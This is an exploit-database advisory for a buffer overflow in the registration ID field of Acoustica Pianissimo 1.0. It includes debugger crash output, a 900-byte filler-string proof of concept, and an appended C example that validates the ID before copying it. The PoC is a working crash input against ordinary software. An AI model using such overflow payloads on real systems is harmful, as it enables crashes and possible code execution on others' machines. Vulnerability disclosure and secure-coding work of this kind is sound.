0day.today - Biggest Exploit Database in the World.
Acoustica Pianissimo 1.0 Build 12 (Registration ID) Buffer Overflow PoC

Vendor: Acoustica, Inc.
Product web page: http://www.acoustica.com
Affected version: 1.0 Build 12

Summary: Pianissimo virtual piano uses a combination of sample playback and advanced physical modeling to create a stunning acoustic grand piano sound. Starting with 250 MB of high quality samples of a Steinway™ Model D grand piano, Pianissimo uses complex signal processing and programming to recreate the warmth, response, and playability of a real grand piano.

Desc: The vulnerability is caused by a boundary error in the processing of user input in the registration ID field of the registration procedure, which can be exploited to cause a buffer overflow when a user inserts a long string for the ID. Successful exploitation could allow execution of arbitrary code on the affected machine.

-----------------------------------------------------------------

(b98.1790): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\VST\Pianissimo\Pianissimo.dll -
eax=00000000 ebx=532d0245 ecx=bdeec3ea edx=00000049 esi=4a18d43c edi=06c07739
eip=061fbda7 esp=00184a28 ebp=4d2d0276 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
Pianissimo!CRefObj::SeekToData+0x4127:
061fbda7 8b86dc200000    mov     eax,dword ptr [esi+20DCh] ds:002b:4a18f518=????????
0:000> d esp-1000
00183a28  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
00183a38  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
00183a48  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
00183a58  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
00183a68  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
00183a78  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
00183a88  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
00183a98  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
0:000> u 061fbda7
Pianissimo!CRefObj::SeekToData+0x4127:
061fbda7 8b86dc200000    mov     eax,dword ptr [esi+20DCh]
061fbdad 50              push    eax
061fbdae 6a30            push    30h
061fbdb0 681cc52c06      push    offset Pianissimo!CRefObj::Tell+0x45bfc (062cc51c)
061fbdb5 6810c52c06      push    offset Pianissimo!CRefObj::Tell+0x45bf0 (062cc510)
061fbdba e841f8ffff      call    Pianissimo!CRefObj::SeekToData+0x3980 (061fb600)
061fbdbf 83c410          add     esp,10h
061fbdc2 8ac3            mov     al,bl

-----------------------------------------------------------------

Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit
           Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit

16.03.2015

--

900 bytes:

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 11111-11111-11111-11111 # 0day.today [2024-11-15] #
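
Added example, not part of the original advisory and not the vendor's code: one way a registration ID field can be validated before it is copied, so that an oversized value such as the 900-byte string above is rejected on length alone. The four-groups-of-five layout is an assumption taken from the sample value 11111-11111-11111-11111 on this page; the names reg_id_parse, check_string and check_filler are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed ID layout (not confirmed by the vendor): 4 groups of 5, '-' separated. */
#define REG_ID_GROUP_LEN 5
#define REG_ID_LEN 23 /* 4 * 5 characters + 3 separators */

enum reg_status { REG_OK, REG_BAD_ARG, REG_BAD_LENGTH, REG_BAD_FORMAT };

/* Check untrusted input (in, in_len) first; copy into out only when it is
 * exactly one well-formed ID, so the copy size never depends on the caller. */
enum reg_status reg_id_parse(const char *in, size_t in_len, char *out, size_t out_size)
{
    if (in == NULL || out == NULL || out_size < REG_ID_LEN + 1)
        return REG_BAD_ARG;
    out[0] = '\0';
    if (in_len != REG_ID_LEN)           /* rejects the 900-byte input up front */
        return REG_BAD_LENGTH;
    for (size_t i = 0; i < REG_ID_LEN; i++) {
        int is_sep = (i % (REG_ID_GROUP_LEN + 1)) == REG_ID_GROUP_LEN;
        unsigned char c = (unsigned char)in[i];
        if (is_sep ? (c != '-') : !isalnum(c))
            return REG_BAD_FORMAT;
    }
    memcpy(out, in, REG_ID_LEN);        /* fixed size, already validated */
    out[REG_ID_LEN] = '\0';
    return REG_OK;
}

/* Demo helpers over constructed inputs. */
enum reg_status check_string(const char *s)
{
    char out[REG_ID_LEN + 1];
    return reg_id_parse(s, strlen(s), out, sizeof out);
}

enum reg_status check_filler(size_t n)  /* n bytes of 'B', capped at 900 */
{
    char big[900], out[REG_ID_LEN + 1];
    if (n > sizeof big) n = sizeof big;
    memset(big, 'B', n);
    return reg_id_parse(big, n, out, sizeof out);
}

int main(void)
{
    printf("sample ID: %d\n", check_string("11111-11111-11111-11111"));
    printf("900 x 'B': %d\n", check_filler(900));
    return 0;
}
```

The length test runs before any byte of the input is read or copied, which is the check the advisory's description says the registration procedure lacks.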